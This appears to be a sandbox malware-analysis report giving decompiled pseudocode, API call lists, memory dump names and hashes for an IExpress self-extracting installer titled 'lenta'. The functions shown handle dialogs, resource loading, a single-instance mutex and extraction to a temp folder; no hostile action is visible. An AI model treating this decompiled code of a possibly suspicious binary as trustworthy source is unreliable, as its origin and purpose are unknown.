                                                                        					EndDialog(_t64, ??);
                                                                        					L39:
                                                                        					__eflags = 1;
                                                                        					return 1;
                                                                        				}
                                                                        				_t42 = 1;
                                                                        				_t10 = _t6 - 0x100;
                                                                        				if(_t10 == 0) {
                                                                        					E003D43D0(_t64, GetDesktopWindow());
                                                                        					SetWindowTextA(_t64, "lenta");
                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                        					__eflags =  *0x3d9a40 - _t42; // 0x3
                                                                        					if(__eflags == 0) {
                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                        					}
                                                                        					L36:
                                                                        					return _t42;
                                                                        				}
                                                                        				if(_t10 == _t42) {
                                                                        					_t20 = _a12 - 1;
                                                                        					__eflags = _t20;
                                                                        					if(_t20 == 0) {
                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0x3d91e4, 0x104);
                                                                        						__eflags = _t21;
                                                                        						if(_t21 == 0) {
                                                                        							L32:
                                                                        							_t58 = 0x4bf;
                                                                        							_push(0);
                                                                        							_push(0x10);
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							L25:
                                                                        							E003D44B9(_t64, _t58);
                                                                        							goto L39;
                                                                        						}
                                                                        						_t49 = 0x3d91e4;
                                                                        						do {
                                                                        							_t23 =  *_t49;
                                                                        							_t49 =  &(_t49[1]);
                                                                        							__eflags = _t23;
                                                                        						} while (_t23 != 0);
                                                                        						__eflags = _t49 - 0x3d91e5 - 3;
                                                                        						if(_t49 - 0x3d91e5 < 3) {
                                                                        							goto L32;
                                                                        						}
                                                                        						_t24 =  *0x3d91e5; // 0x3a
                                                                        						__eflags = _t24 - 0x3a;
                                                                        						if(_t24 == 0x3a) {
                                                                        							L21:
                                                                        							_t25 = GetFileAttributesA(0x3d91e4);
                                                                        							__eflags = _t25 - 0xffffffff;
                                                                        							if(_t25 != 0xffffffff) {
                                                                        								L26:
                                                                        								E003D658A(0x3d91e4, 0x104, 0x3d1140);
                                                                        								_t27 = E003D58C8(0x3d91e4);
                                                                        								__eflags = _t27;
                                                                        								if(_t27 != 0) {
                                                                        									__eflags =  *0x3d91e4 - 0x5c;
                                                                        									if( *0x3d91e4 != 0x5c) {
                                                                        										L30:
                                                                        										_t30 = E003D597D(0x3d91e4, 1, _t64, 1);
                                                                        										__eflags = _t30;
                                                                        										if(_t30 == 0) {
                                                                        											L35:
                                                                        											_t42 = 1;
                                                                        											__eflags = 1;
                                                                        											goto L36;
                                                                        										}
                                                                        										L31:
                                                                        										_t42 = 1;
                                                                        										EndDialog(_t64, 1);
                                                                        										goto L36;
                                                                        									}
                                                                        									__eflags =  *0x3d91e5 - 0x5c;
                                                                        									if( *0x3d91e5 == 0x5c) {
                                                                        										goto L31;
                                                                        									}
                                                                        									goto L30;
                                                                        								}
                                                                        								_push(0);
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_t58 = 0x4be;
                                                                        								goto L25;
                                                                        							}
                                                                        							_t32 = E003D44B9(_t64, 0x54a, 0x3d91e4, 0, 0x20, 4);
                                                                        							__eflags = _t32 - 6;
                                                                        							if(_t32 != 6) {
                                                                        								goto L35;
                                                                        							}
                                                                        							_t33 = CreateDirectoryA(0x3d91e4, 0);
                                                                        							__eflags = _t33;
                                                                        							if(_t33 != 0) {
                                                                        								goto L26;
                                                                        							}
                                                                        							_push(0);
                                                                        							_push(0x10);
                                                                        							_push(0);
                                                                        							_push(0x3d91e4);
                                                                        							_t58 = 0x4cb;
                                                                        							goto L25;
                                                                        						}
                                                                        						__eflags =  *0x3d91e4 - 0x5c;
                                                                        						if( *0x3d91e4 != 0x5c) {
                                                                        							goto L32;
                                                                        						}
                                                                        						__eflags = _t24 - 0x5c;
                                                                        						if(_t24 != 0x5c) {
                                                                        							goto L32;
                                                                        						}
                                                                        						goto L21;
                                                                        					}
                                                                        					_t34 = _t20 - 1;
                                                                        					__eflags = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						EndDialog(_t64, 0);
                                                                        						 *0x3d9124 = 0x800704c7;
                                                                        						goto L39;
                                                                        					}
                                                                        					__eflags = _t34 != 0x834;
                                                                        					if(_t34 != 0x834) {
                                                                        						goto L36;
                                                                        					}
                                                                        					_t37 = LoadStringA( *0x3d9a3c, 0x3e8, 0x3d8598, 0x200);
                                                                        					__eflags = _t37;
                                                                        					if(_t37 != 0) {
                                                                        						_t38 = E003D4224(_t64, _t46, _t46);
                                                                        						__eflags = _t38;
                                                                        						if(_t38 == 0) {
                                                                        							goto L36;
                                                                        						}
                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0x3d87a0);
                                                                        						__eflags = _t39;
                                                                        						if(_t39 != 0) {
                                                                        							goto L36;
                                                                        						}
                                                                        						_t63 = 0x4c0;
                                                                        						L9:
                                                                        						E003D44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                        						_push(0);
                                                                        						goto L38;
                                                                        					}
                                                                        					_t63 = 0x4b1;
                                                                        					goto L9;
                                                                        				}
                                                                        				return 0;
                                                                        			}

























                                                                        0x003d321b
                                                                        0x003d321e
                                                                        0x003d3221
                                                                        0x003d343c
                                                                        0x003d343e
                                                                        0x003d343f
                                                                        0x003d3445
                                                                        0x003d3447
                                                                        0x00000000
                                                                        0x003d3447
                                                                        0x003d3229
                                                                        0x003d322a
                                                                        0x003d322f
                                                                        0x003d33ec
                                                                        0x003d33f7
                                                                        0x003d3410
                                                                        0x003d3416
                                                                        0x003d341d
                                                                        0x003d342d
                                                                        0x003d342d
                                                                        0x003d3438
                                                                        0x00000000
                                                                        0x003d3438
                                                                        0x003d3237
                                                                        0x003d3243
                                                                        0x003d3243
                                                                        0x003d3246
                                                                        0x003d32ee
                                                                        0x003d32f4
                                                                        0x003d32f6
                                                                        0x003d33d4
                                                                        0x003d33d6
                                                                        0x003d33db
                                                                        0x003d33dc
                                                                        0x003d33de
                                                                        0x003d33df
                                                                        0x003d3370
                                                                        0x003d3372
                                                                        0x00000000
                                                                        0x003d3372
                                                                        0x003d32fc
                                                                        0x003d3301
                                                                        0x003d3301
                                                                        0x003d3303
                                                                        0x003d3304
                                                                        0x003d3304
                                                                        0x003d330a
                                                                        0x003d330d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3313
                                                                        0x003d3318
                                                                        0x003d331a
                                                                        0x003d3331
                                                                        0x003d3332
                                                                        0x003d333a
                                                                        0x003d333d
                                                                        0x003d337c
                                                                        0x003d3388
                                                                        0x003d338f
                                                                        0x003d3394
                                                                        0x003d3396
                                                                        0x003d33a4
                                                                        0x003d33ab
                                                                        0x003d33b6
                                                                        0x003d33be
                                                                        0x003d33c3
                                                                        0x003d33c5
                                                                        0x003d3435
                                                                        0x003d3437
                                                                        0x003d3437
                                                                        0x00000000
                                                                        0x003d3437
                                                                        0x003d33c7
                                                                        0x003d33c9
                                                                        0x003d33cc
                                                                        0x00000000
                                                                        0x003d33cc
                                                                        0x003d33ad
                                                                        0x003d33b4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d33b4
                                                                        0x003d3398
                                                                        0x003d3399
                                                                        0x003d339b
                                                                        0x003d339c
                                                                        0x003d339d
                                                                        0x00000000
                                                                        0x003d339d
                                                                        0x003d334c
                                                                        0x003d3351
                                                                        0x003d3354
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d335c
                                                                        0x003d3362
                                                                        0x003d3364
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3366
                                                                        0x003d3367
                                                                        0x003d3369
                                                                        0x003d336a
                                                                        0x003d336b
                                                                        0x00000000
                                                                        0x003d336b
                                                                        0x003d331c
                                                                        0x003d3323
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3329
                                                                        0x003d332b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d332b
                                                                        0x003d324c
                                                                        0x003d324c
                                                                        0x003d324f
                                                                        0x003d32c8
                                                                        0x003d32ce
                                                                        0x00000000
                                                                        0x003d32ce
                                                                        0x003d3251
                                                                        0x003d3256
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3271
                                                                        0x003d3277
                                                                        0x003d3279
                                                                        0x003d3298
                                                                        0x003d329d
                                                                        0x003d329f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d32b0
                                                                        0x003d32b6
                                                                        0x003d32b8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d32be
                                                                        0x003d3280
                                                                        0x003d3289
                                                                        0x003d328e
                                                                        0x00000000
                                                                        0x003d328e
                                                                        0x003d327b
                                                                        0x00000000
                                                                        0x003d327b
                                                                        0x00000000

                                                                        APIs
                                                                        • LoadStringA.USER32(000003E8,003D8598,00000200), ref: 003D3271
                                                                        • GetDesktopWindow.USER32 ref: 003D33E2
                                                                        • SetWindowTextA.USER32(?,lenta), ref: 003D33F7
                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 003D3410
                                                                        • GetDlgItem.USER32(?,00000836), ref: 003D3426
                                                                        • EnableWindow.USER32(00000000), ref: 003D342D
                                                                        • EndDialog.USER32(?,00000000), ref: 003D343F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$lenta
                                                                        • API String ID: 2418873061-1649533613
                                                                        • Opcode ID: 1c55354154b68ed897d7d7c45f37220a56f8133d4902425c647e66494f15f3e2
                                                                        • Instruction ID: 5aad362215e843efda4a32bc23a3a03605a01592e2281dad21a79fb0dc270209
                                                                        • Opcode Fuzzy Hash: 1c55354154b68ed897d7d7c45f37220a56f8133d4902425c647e66494f15f3e2
                                                                        • Instruction Fuzzy Hash: 605139337822517BEB235B36BD4DF7B2B6DDB46B54F50402BF245967C0CAA88E019263
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E003D2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t13;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				void* _t27;
                                                                        				struct HRSRC__* _t31;
                                                                        				intOrPtr _t33;
                                                                        				void* _t43;
                                                                        				void* _t48;
                                                                        				signed int _t65;
                                                                        				struct HINSTANCE__* _t66;
                                                                        				signed int _t67;
                                                                        
                                                                        				_t13 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t13 ^ _t67;
                                                                        				_t65 = 0;
                                                                        				_t66 = __ecx;
                                                                        				_t48 = __edx;
                                                                        				 *0x3d9a3c = __ecx;
                                                                        				memset(0x3d9140, 0, 0x8fc);
                                                                        				memset(0x3d8a20, 0, 0x32c);
                                                                        				memset(0x3d88c0, 0, 0x104);
                                                                        				 *0x3d93ec = 1;
                                                                        				_t20 = E003D468F("TITLE", 0x3d9154, 0x7f);
                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                        					_t64 = 0x4b1;
                                                                        					goto L32;
                                                                        				} else {
                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                        					 *0x3d858c = _t27;
                                                                        					SetEvent(_t27);
                                                                        					_t64 = 0x3d9a34;
                                                                        					if(E003D468F("EXTRACTOPT", 0x3d9a34, 4) != 0) {
                                                                        						if(( *0x3d9a34 & 0x000000c0) == 0) {
                                                                        							L12:
                                                                        							 *0x3d9120 =  *0x3d9120 & _t65;
                                                                        							if(E003D5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                        								if( *0x3d8a3a == 0) {
                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                        									if(_t31 != 0) {
                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                        									}
                                                                        									if( *0x3d8184 != 0) {
                                                                        										__imp__#17();
                                                                        									}
                                                                        									if( *0x3d8a24 == 0) {
                                                                        										_t57 = _t65;
                                                                        										if(E003D36EE(_t65) == 0) {
                                                                        											goto L33;
                                                                        										} else {
                                                                        											_t33 =  *0x3d9a40; // 0x3
                                                                        											_t48 = 1;
                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                        												if(( *0x3d9a34 & 0x00000100) == 0 || ( *0x3d8a38 & 0x00000001) != 0 || E003D18A3(_t64, _t66) != 0) {
                                                                        													goto L30;
                                                                        												} else {
                                                                        													_t64 = 0x7d6;
                                                                        													if(E003D6517(_t57, 0x7d6, _t34, E003D19E0, 0x547, 0x83e) != 0x83d) {
                                                                        														goto L33;
                                                                        													} else {
                                                                        														goto L30;
                                                                        													}
                                                                        												}
                                                                        											} else {
                                                                        												L30:
                                                                        												_t23 = _t48;
                                                                        											}
                                                                        										}
                                                                        									} else {
                                                                        										_t23 = 1;
                                                                        									}
                                                                        								} else {
                                                                        									E003D2390(0x3d8a3a);
                                                                        									goto L33;
                                                                        								}
                                                                        							} else {
                                                                        								_t64 = 0x520;
                                                                        								L32:
                                                                        								E003D44B9(0, _t64, 0, 0, 0x10, 0);
                                                                        								goto L33;
                                                                        							}
                                                                        						} else {
                                                                        							_t64 =  &_v268;
                                                                        							if(E003D468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                        								goto L3;
                                                                        							} else {
                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                        								 *0x3d8588 = _t43;
                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									if(( *0x3d9a34 & 0x00000080) == 0) {
                                                                        										_t64 = 0x524;
                                                                        										if(E003D44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                        											goto L12;
                                                                        										} else {
                                                                        											goto L11;
                                                                        										}
                                                                        									} else {
                                                                        										_t64 = 0x54b;
                                                                        										E003D44B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                        										L11:
                                                                        										CloseHandle( *0x3d8588);
                                                                        										 *0x3d9124 = 0x800700b7;
                                                                        										goto L33;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						L3:
                                                                        						_t64 = 0x4b1;
                                                                        						E003D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        						 *0x3d9124 = 0x80070714;
                                                                        						L33:
                                                                        						_t23 = 0;
                                                                        					}
                                                                        				}
                                                                        				return E003D6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                        			}



















                                                                        0x003d2cb5
                                                                        0x003d2cbc
                                                                        0x003d2cc7
                                                                        0x003d2cc9
                                                                        0x003d2cd1
                                                                        0x003d2cd3
                                                                        0x003d2cd9
                                                                        0x003d2ce9
                                                                        0x003d2cf9
                                                                        0x003d2d0e
                                                                        0x003d2d15
                                                                        0x003d2d1c
                                                                        0x003d2ef3
                                                                        0x00000000
                                                                        0x003d2d2d
                                                                        0x003d2d34
                                                                        0x003d2d3b
                                                                        0x003d2d40
                                                                        0x003d2d48
                                                                        0x003d2d59
                                                                        0x003d2d84
                                                                        0x003d2e1f
                                                                        0x003d2e1f
                                                                        0x003d2e2e
                                                                        0x003d2e41
                                                                        0x003d2e5a
                                                                        0x003d2e62
                                                                        0x003d2e6c
                                                                        0x003d2e6c
                                                                        0x003d2e75
                                                                        0x003d2e77
                                                                        0x003d2e77
                                                                        0x003d2e84
                                                                        0x003d2e8b
                                                                        0x003d2e94
                                                                        0x00000000
                                                                        0x003d2e96
                                                                        0x003d2e96
                                                                        0x003d2e9e
                                                                        0x003d2ea2
                                                                        0x003d2eba
                                                                        0x00000000
                                                                        0x003d2ece
                                                                        0x003d2ede
                                                                        0x003d2eed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d2eed
                                                                        0x003d2eef
                                                                        0x003d2eef
                                                                        0x003d2eef
                                                                        0x003d2eef
                                                                        0x003d2ea2
                                                                        0x003d2e86
                                                                        0x003d2e88
                                                                        0x003d2e88
                                                                        0x003d2e43
                                                                        0x003d2e48
                                                                        0x00000000
                                                                        0x003d2e48
                                                                        0x003d2e30
                                                                        0x003d2e30
                                                                        0x003d2ef8
                                                                        0x003d2f01
                                                                        0x00000000
                                                                        0x003d2f01
                                                                        0x003d2d8a
                                                                        0x003d2d8f
                                                                        0x003d2da1
                                                                        0x00000000
                                                                        0x003d2da3
                                                                        0x003d2dae
                                                                        0x003d2db4
                                                                        0x003d2dbb
                                                                        0x00000000
                                                                        0x003d2dca
                                                                        0x003d2dd3
                                                                        0x003d2df5
                                                                        0x003d2e02
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d2dd5
                                                                        0x003d2dde
                                                                        0x003d2de3
                                                                        0x003d2e04
                                                                        0x003d2e0a
                                                                        0x003d2e10
                                                                        0x00000000
                                                                        0x003d2e10
                                                                        0x003d2dd3
                                                                        0x003d2dbb
                                                                        0x003d2da1
                                                                        0x003d2d5b
                                                                        0x003d2d5b
                                                                        0x003d2d5d
                                                                        0x003d2d69
                                                                        0x003d2d6e
                                                                        0x003d2f06
                                                                        0x003d2f06
                                                                        0x003d2f06
                                                                        0x003d2d59
                                                                        0x003d2f18

                                                                        APIs
                                                                        • memset.MSVCRT ref: 003D2CD9
                                                                        • memset.MSVCRT ref: 003D2CE9
                                                                        • memset.MSVCRT ref: 003D2CF9
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46A0
                                                                          • Part of subcall function 003D468F: SizeofResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46A9
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46C3
                                                                          • Part of subcall function 003D468F: LoadResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46CC
                                                                          • Part of subcall function 003D468F: LockResource.KERNEL32(00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46D3
                                                                          • Part of subcall function 003D468F: memcpy_s.MSVCRT ref: 003D46E5
                                                                          • Part of subcall function 003D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46EF
                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D2D34
                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 003D2D40
                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 003D2DAE
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 003D2DBD
                                                                        • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 003D2E0A
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                        • API String ID: 1002816675-2993962200
                                                                        • Opcode ID: 3c62b8c1aeae58ae30711e4b7fa812c1c80945ac3d36f9165c0dc195fa4690e0
                                                                        • Instruction ID: a4c9ff45844b7f98333204d96886707cb920ab09b1c707ca483a3af6fd182b4c
                                                                        • Opcode Fuzzy Hash: 3c62b8c1aeae58ae30711e4b7fa812c1c80945ac3d36f9165c0dc195fa4690e0
                                                                        • Instruction Fuzzy Hash: 1C51D173641301ABE723AB75BD4AB7B27ADEB65700F05442BF942DA3D1DAB48C41C621
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 81%
                                                                        			E003D34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                        				void* _t9;
                                                                        				void* _t12;
                                                                        				void* _t13;
                                                                        				void* _t17;
                                                                        				void* _t23;
                                                                        				void* _t25;
                                                                        				struct HWND__* _t35;
                                                                        				struct HWND__* _t38;
                                                                        				void* _t39;
                                                                        
                                                                        				_t9 = _a8 - 0x10;
                                                                        				if(_t9 == 0) {
                                                                        					__eflags = 1;
                                                                        					L19:
                                                                        					_push(0);
                                                                        					 *0x3d91d8 = 1;
                                                                        					L20:
                                                                        					_push(_a4);
                                                                        					L21:
                                                                        					EndDialog();
                                                                        					L22:
                                                                        					return 1;
                                                                        				}
                                                                        				_push(1);
                                                                        				_pop(1);
                                                                        				_t12 = _t9 - 0xf2;
                                                                        				if(_t12 == 0) {
                                                                        					__eflags = _a12 - 0x1b;
                                                                        					if(_a12 != 0x1b) {
                                                                        						goto L22;
                                                                        					}
                                                                        					goto L19;
                                                                        				}
                                                                        				_t13 = _t12 - 0xe;
                                                                        				if(_t13 == 0) {
                                                                        					_t35 = _a4;
                                                                        					 *0x3d8584 = _t35;
                                                                        					E003D43D0(_t35, GetDesktopWindow());
                                                                        					__eflags =  *0x3d8184; // 0x1
                                                                        					if(__eflags != 0) {
                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                        					}
                                                                        					SetWindowTextA(_t35, "lenta");
                                                                        					_t17 = CreateThread(0, 0, E003D4FE0, 0, 0, 0x3d8798);
                                                                        					 *0x3d879c = _t17;
                                                                        					__eflags = _t17;
                                                                        					if(_t17 != 0) {
                                                                        						goto L22;
                                                                        					} else {
                                                                        						E003D44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                        						_push(0);
                                                                        						_push(_t35);
                                                                        						goto L21;
                                                                        					}
                                                                        				}
                                                                        				_t23 = _t13 - 1;
                                                                        				if(_t23 == 0) {
                                                                        					__eflags = _a12 - 2;
                                                                        					if(_a12 != 2) {
                                                                        						goto L22;
                                                                        					}
                                                                        					ResetEvent( *0x3d858c);
                                                                        					_t38 =  *0x3d8584; // 0x0
                                                                        					_t25 = E003D44B9(_t38, 0x4b2, 0x3d1140, 0, 0x20, 4);
                                                                        					__eflags = _t25 - 6;
                                                                        					if(_t25 == 6) {
                                                                        						L11:
                                                                        						 *0x3d91d8 = 1;
                                                                        						SetEvent( *0x3d858c);
                                                                        						_t39 =  *0x3d879c; // 0x0
                                                                        						E003D3680(_t39);
                                                                        						_push(0);
                                                                        						goto L20;
                                                                        					}
                                                                        					__eflags = _t25 - 1;
                                                                        					if(_t25 == 1) {
                                                                        						goto L11;
                                                                        					}
                                                                        					SetEvent( *0x3d858c);
                                                                        					goto L22;
                                                                        				}
                                                                        				if(_t23 == 0xe90) {
                                                                        					TerminateThread( *0x3d879c, 0);
                                                                        					EndDialog(_a4, _a12);
                                                                        					return 1;
                                                                        				}
                                                                        				return 0;
                                                                        			}












                                                                        0x003d34fb
                                                                        0x003d34fe
                                                                        0x003d3665
                                                                        0x003d3666
                                                                        0x003d3666
                                                                        0x003d3668
                                                                        0x003d366e
                                                                        0x003d366e
                                                                        0x003d3671
                                                                        0x003d3671
                                                                        0x003d3677
                                                                        0x00000000
                                                                        0x003d3677
                                                                        0x003d3504
                                                                        0x003d3506
                                                                        0x003d3507
                                                                        0x003d350c
                                                                        0x003d365b
                                                                        0x003d365f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3661
                                                                        0x003d3512
                                                                        0x003d3515
                                                                        0x003d35be
                                                                        0x003d35c1
                                                                        0x003d35d1
                                                                        0x003d35d8
                                                                        0x003d35de
                                                                        0x003d35f8
                                                                        0x003d3617
                                                                        0x003d3617
                                                                        0x003d3623
                                                                        0x003d3637
                                                                        0x003d363d
                                                                        0x003d3642
                                                                        0x003d3644
                                                                        0x00000000
                                                                        0x003d3646
                                                                        0x003d3652
                                                                        0x003d3657
                                                                        0x003d3658
                                                                        0x00000000
                                                                        0x003d3658
                                                                        0x003d3644
                                                                        0x003d351b
                                                                        0x003d351d
                                                                        0x003d354f
                                                                        0x003d3553
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d355f
                                                                        0x003d3565
                                                                        0x003d357c
                                                                        0x003d3581
                                                                        0x003d3584
                                                                        0x003d359b
                                                                        0x003d35a1
                                                                        0x003d35a7
                                                                        0x003d35ad
                                                                        0x003d35b3
                                                                        0x003d35b8
                                                                        0x00000000
                                                                        0x003d35b8
                                                                        0x003d3586
                                                                        0x003d3588
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3590
                                                                        0x00000000
                                                                        0x003d3590
                                                                        0x003d3524
                                                                        0x003d3535
                                                                        0x003d3541
                                                                        0x00000000
                                                                        0x003d3549
                                                                        0x00000000

                                                                        APIs
                                                                        • TerminateThread.KERNEL32(00000000), ref: 003D3535
                                                                        • EndDialog.USER32(?,?), ref: 003D3541
                                                                        • ResetEvent.KERNEL32 ref: 003D355F
                                                                        • SetEvent.KERNEL32(003D1140,00000000,00000020,00000004), ref: 003D3590
                                                                        • GetDesktopWindow.USER32 ref: 003D35C7
                                                                        • GetDlgItem.USER32(?,0000083B), ref: 003D35F1
                                                                        • SendMessageA.USER32(00000000), ref: 003D35F8
                                                                        • GetDlgItem.USER32(?,0000083B), ref: 003D3610
                                                                        • SendMessageA.USER32(00000000), ref: 003D3617
                                                                        • SetWindowTextA.USER32(?,lenta), ref: 003D3623
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,003D8798), ref: 003D3637
                                                                        • EndDialog.USER32(?,00000000), ref: 003D3671
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                        • String ID: lenta
                                                                        • API String ID: 2406144884-2780258678
                                                                        • Opcode ID: 729507870c774de10f3d4bb8b8b5a292d27009038198234df9755c945e4a7937
                                                                        • Instruction ID: 4b19dcd94946a70184165d8f138d5c0a81dd302e0a7e336c21b707680fa907e2
                                                                        • Opcode Fuzzy Hash: 729507870c774de10f3d4bb8b8b5a292d27009038198234df9755c945e4a7937
                                                                        • Instruction Fuzzy Hash: DC31A072241201BBD7231F25FD8DE2A3B7DE786B01F14492BF602957A0CB71DE10DA56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 50%
                                                                        			E003D4224(char __ecx) {
                                                                        				char* _v8;
                                                                        				_Unknown_base(*)()* _v12;
                                                                        				_Unknown_base(*)()* _v16;
                                                                        				_Unknown_base(*)()* _v20;
                                                                        				char* _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v40;
                                                                        				char _v44;
                                                                        				char _v48;
                                                                        				char _v52;
                                                                        				_Unknown_base(*)()* _t26;
                                                                        				_Unknown_base(*)()* _t28;
                                                                        				_Unknown_base(*)()* _t29;
                                                                        				_Unknown_base(*)()* _t32;
                                                                        				char _t42;
                                                                        				char* _t44;
                                                                        				char* _t61;
                                                                        				void* _t63;
                                                                        				char* _t65;
                                                                        				struct HINSTANCE__* _t66;
                                                                        				char _t67;
                                                                        				void* _t71;
